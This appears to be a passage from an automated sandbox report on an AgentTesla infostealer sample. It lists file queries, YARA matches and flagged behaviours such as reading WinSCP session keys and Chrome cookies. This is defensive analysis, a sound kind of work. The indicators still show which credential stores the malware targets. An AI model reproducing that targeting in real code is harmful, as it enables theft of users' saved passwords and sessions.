Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Users\user\Desktop\dhPWt112uC.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\dhPWt112uC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 11.2.newapp.exe.4271d80.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dhPWt112uC.exe.3821f18.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dhPWt112uC.exe.37e4cf8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.3ba2480.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.3b65260.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.newapp.exe.4271d80.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.3ba2480.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.3b65260.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dhPWt112uC.exe.3821f18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4168329440.000000000344C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4168329440.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4167926761.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2008765342.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2008765342.000000000328C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4167926761.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhPWt112uC.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhPWt112uC.exe PID: 7628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 8136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 2260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 5324, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\dhPWt112uC.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
